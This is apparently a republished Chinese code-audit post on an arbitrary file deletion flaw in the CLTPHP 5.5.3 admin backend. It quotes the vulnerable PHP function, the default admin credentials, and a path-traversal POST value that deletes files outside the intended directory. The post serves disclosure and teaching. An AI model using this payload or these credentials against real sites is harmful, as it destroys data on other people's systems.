2. 程式人生 > >【代碼審計】CLTPHP_v5.5.3後臺任意文件刪除漏洞分析

【代碼審計】CLTPHP_v5.5.3後臺任意文件刪除漏洞分析

阿新 發佈:2018-12-02
login alt flag div 網站源碼 用戶 urn 測試 result

0x00 環境準備

CLTPHP官網:http://www.cltphp.com

網站源碼版本:CLTPHP內容管理系統5.5.3版本

程序源碼下載:https://gitee.com/chichu/cltphp

默認後臺地址: http://127.0.0.1/admin/login/index.html

默認賬號密碼: 後臺登錄名:admin 密碼:admin123

測試網站首頁:

技術分享圖片

0x01 代碼分析

1、/app/admin/controller/Database.php 第221-248行:

  1. public function delSqlFiles() {
  2. $batchFlag = input(‘param.batchFlag‘, 0, ‘intval‘);
  3. //批量刪除
  4. if ($batchFlag) {
  5. $files = input(‘key‘, array());
  6. }else {
  7. $files[] = input(‘sqlfilename‘ , ‘‘);
  8. }
  9. if (empty($files)) {
  10. 10. $result[‘msg‘] = ‘請選擇要刪除的sql文件!‘;
  11. 11. $result[‘code‘] = 0;
  12. 12. return $result;
  13. 13. }
  14. 14.
  15. 15. foreach ($files as $file) {
  16. 16. $a = unlink($this->datadir.‘/‘ . $file);
  17. 17. }
  18. 18. if($a){
  19. 19. $result[‘msg‘] = ‘刪除成功!‘;
  20. 20. $result[‘url‘] = url(‘restore‘);
  21. 21. $result[‘code‘] = 1;
  22. 22. return $result;
  23. 23. }else
    {
  24. 24. $result[‘msg‘] = ‘刪除失敗!‘;
  25. 25. $result[‘code‘] = 0;
  26. 26. return $result;
  27. 27. }

28. }

在這段函數中,參數sqlfilename未經任何處理,直接帶入unlink函數中刪除,導致程序在實現上存在任意文件刪除漏洞,攻擊者可通過該漏洞刪除任意文件。

0x02 漏洞利用

1、 在根目錄新建test.txt,作為漏洞測試文件

技術分享圖片

2、 構造URL,成功刪除根目錄的1.txt文件

http://127.0.0.1/admin/Database/delSqlFiles.html

POST: sqlfilename=..\\..\\1.txt

技術分享圖片

0x03 修復建議

1、對於要刪除的文件,通過正則判斷用戶輸入的參數的格式,看輸入的格式是否合法。

最後

歡迎關註個人微信公眾號:Bypass--,每周原創一篇技術幹貨。

技術分享圖片

【代碼審計】CLTPHP_v5.5.3後臺任意文件刪除漏洞分析

相關推薦

審計CLTPHP_v5.5.3後臺任意刪除漏洞分析

login alt flag div 網站源碼 用戶 urn 測試 result 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://gitee.c

審計CLTPHP_v5.5.3後臺任意下載漏洞分析

func attach database 9.png jpg 允許 left 簡單 服務 0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站源碼版本:CLTPHP內容管理系統5.5.3版本 程序源碼下載:https://git

程式碼審計CLTPHP_v5.5.3 前臺任意檔案上傳漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3前臺XML外部實體注入漏洞分析

0x01 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/login/index

程式碼審計CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計CLTPHP_v5.5.3後臺目錄遍歷漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

Discuz!X 3.4 任意刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

審計XDCMS 報錯註入

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

審計VAuditDemo 重裝漏洞

demo http ima 重裝 config 退出 網站安全 執行 知識 一、源碼安裝漏洞介紹   一般在PHP源碼程序都有一個初始安裝的功能,如果相關代碼沒有對參數進行嚴格過濾,可能會導致攻擊者訪問安裝頁面(install.php)或構造數據包,對網站進行重新安裝,從而

審計VAuditDemo 包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

審計VAuditDemo 後臺登錄功能驗證繞過

-1 php 審計 use 存在 功能 post nbsp logs 在 admin/logCheck.php中 $_POST[‘user‘]和$_POST[‘pass‘] 未經過任何過濾或者編碼處理就傳入到$query中,可能存在萬能密碼繞過機制 但是$pass經過了加

審計兩個任意讀取漏洞實例

狀態 內容 cfg 必須 名稱 ror div 完整 FN 0x00 前言 0x01 漏洞實例一 環境搭建: XYHCMS官網:http://www.xyhcms.com/ 網站源碼版本:XYHCMS V3.5(2017-12-04 更新) 程序源碼下載:https:

審計Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.

JS壓縮使用YUI Compressor對js進行壓縮處理

js代碼 bird spell 說明 ber enum ide relative auto 概述在使用html5開發Hybird APP的時候,可能會引入大量的js包,另外對於一些核心的js文件,進行一些特殊的處理,如壓縮和加密就顯得很重要了,YUI Compressor就

筆記JTable 、TableModel的使用3

init ima ble ane style size mod 通過 efault 在java中插入Table,並通過TableModel插入表格初始化狀態後,如果需要第一行標題欄進行重命名,直接利用TableModel接口去實現列名修改,在圖形顯示中是無法實現的。 這裏需

學習PHP面向對象之抽象類與接口

部分 truct 中國人 protect nds 16px 使用 function col 一、什麽是抽象方法?   一個方法如果沒有方法體(不使用"{}",直接使用分號結束的方法,才是沒有方法體的方法),則這個方法就是抽象方法 1、聲明一個方法,不使用{},而直接分號結束

學習PYHTON 元組

ext test .py logs 最大 最大值 不同 trace pytho Python的元組與列表類似,不同之處在於元組的元素不能修改。也可進行分片 和 連接操作. 元組使用小括號,列表使用方括號。 一、訪問元組 #coding=utf-8 Tuple = (‘na

學習PYTHON 異常處理

上下文 當前 異常處理 通過 工作 相同 try語句 標記 異常信息 一、什麽是異常   在程序執行過程中可能會影響程序的正常執行,一般情況下,在python無法正常處理程序時就會發生一個異常   當python腳本發生異常時我們需要捕獲處理他,否則程序會終止執行 二、異常

優化考慮使用靜態工廠方法取代構造器

ava tracking 什麽事 依據 mod true data -m span 靜態工廠方法與設計模式中的工廠方法模式不同,和設計模式中的工廠方法模式不直接相應。 使用靜態工廠方法比構造器的優勢: 第一、靜態工廠方法是有名稱的,而構造器是通過